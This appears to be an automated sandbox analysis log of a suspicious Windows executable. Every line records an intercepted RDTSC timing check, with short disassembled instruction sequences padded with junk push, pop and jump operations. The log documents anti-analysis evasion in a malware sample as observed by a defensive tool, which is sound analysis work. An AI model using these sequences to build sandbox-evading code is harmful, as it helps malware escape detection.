                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11CDF45 second address: 11CDF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3BC5 second address: 11D3BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F5D692C6EEFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3BDE second address: 11D3C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5D68C8C004h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 jnl 00007F5D68C8BFF6h 0x00000018 je 00007F5D68C8BFF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3119 second address: 11D3134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5D692C6EEEh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3134 second address: 11D3143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5D68C8BFF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3143 second address: 11D3155 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5D692C6EE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D328F second address: 11D3293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3293 second address: 11D3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3299 second address: 11D32A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D32A5 second address: 11D32AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D32AB second address: 11D32B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D33EF second address: 11D33FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3874 second address: 11D3879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3879 second address: 11D38C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D692C6EF8h 0x00000008 jo 00007F5D692C6EE6h 0x0000000e jmp 00007F5D692C6EF9h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D692C6EEDh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38C7 second address: 11D38E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F5D68C8BFF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38E3 second address: 11D38E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38E7 second address: 11D38ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121AEF6 second address: 121AEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 121959C second address: 12195A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 122355F second address: 1223591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C008h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D68C8C006h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1223591 second address: 122359B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D692C6EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 122329F second address: 12232A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12232A3 second address: 12232D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 jmp 00007F5D692C6EEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D692C6EF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230EEB second address: 1230EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230EFF second address: 1230F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F03 second address: 1230F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F07 second address: 1230F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1230F0D second address: 1230F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5D68C8BFFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1231083 second address: 1231093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D692C6EE6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1231093 second address: 12310A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F5D68C8BFF6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 123379C second address: 12337A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12337A0 second address: 12337A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382A5 second address: 12382B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382B1 second address: 12382BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D68C8BFF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382BC second address: 12382C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F5D692C6EE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12382C8 second address: 123830D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5D68C8C008h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F5D68C8C00Ah 0x00000011 jmp 00007F5D68C8C002h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jo 00007F5D68C8C008h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 123830D second address: 1238313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1238462 second address: 12384A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C001h 0x00000007 js 00007F5D68C8BFF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D68C8C006h 0x00000016 jmp 00007F5D68C8C001h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384A6 second address: 12384E3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D692C6EE6h 0x00000008 ja 00007F5D692C6EE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5D692C6EEEh 0x00000016 jmp 00007F5D692C6EF9h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384E3 second address: 12384E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12384E9 second address: 12384ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124722E second address: 1247232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1247232 second address: 1247236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1247236 second address: 124723C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124712A second address: 124712F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124712F second address: 1247139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA78 second address: 124FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA7C second address: 124FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA80 second address: 124FA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FA94 second address: 124FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FBE1 second address: 124FBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FBE5 second address: 124FBEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD37 second address: 124FD41 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D692C6EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD41 second address: 124FD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD47 second address: 124FD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD4E second address: 124FD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F5D68C8C000h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F5D68C8BFFEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD7B second address: 124FD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD81 second address: 124FD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5D68C8BFFCh 0x0000000c jo 00007F5D68C8BFF6h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 124FD9B second address: 124FDA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254BF3 second address: 1254BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F5D68C8BFF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254BFF second address: 1254C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C03 second address: 1254C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C09 second address: 1254C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F5D692C6EFEh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254C19 second address: 1254C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254D97 second address: 1254D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1254D9D second address: 1254DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1262414 second address: 1262420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 125FA4B second address: 125FA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5D68C8BFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F5D68C8BFF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 125FA7D second address: 125FA92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jg 00007F5D692C6EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1168D92 second address: 1168D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1168D96 second address: 1168D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12720E9 second address: 12720F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12750AB second address: 12750AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274BDE second address: 1274BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5D68C8C005h 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274D80 second address: 1274DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5D692C6EF3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F5D692C6EE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DA2 second address: 1274DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8BFFBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DB7 second address: 1274DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1274DBD second address: 1274DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1276816 second address: 1276829 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007F5D692C6EE6h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1276829 second address: 1276835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128AF78 second address: 128AF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1289D6A second address: 1289D7B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D68C8BFFAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A1D2 second address: 128A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EF8h 0x00000009 jng 00007F5D692C6EE6h 0x0000000f popad 0x00000010 jmp 00007F5D692C6EEAh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A203 second address: 128A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A32A second address: 128A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A347 second address: 128A34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A669 second address: 128A673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A673 second address: 128A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5D68C8C009h 0x0000000a push ecx 0x0000000b jmp 00007F5D68C8BFFCh 0x00000010 pop ecx 0x00000011 popad 0x00000012 push edx 0x00000013 jp 00007F5D68C8BFFCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A6A9 second address: 128A6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F5D692C6EE6h 0x0000000c js 00007F5D692C6EE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A80F second address: 128A815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A815 second address: 128A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A81B second address: 128A821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A821 second address: 128A826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A826 second address: 128A82C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A980 second address: 128A9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EF7h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A9A3 second address: 128A9A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 128A9A8 second address: 128A9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EEBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
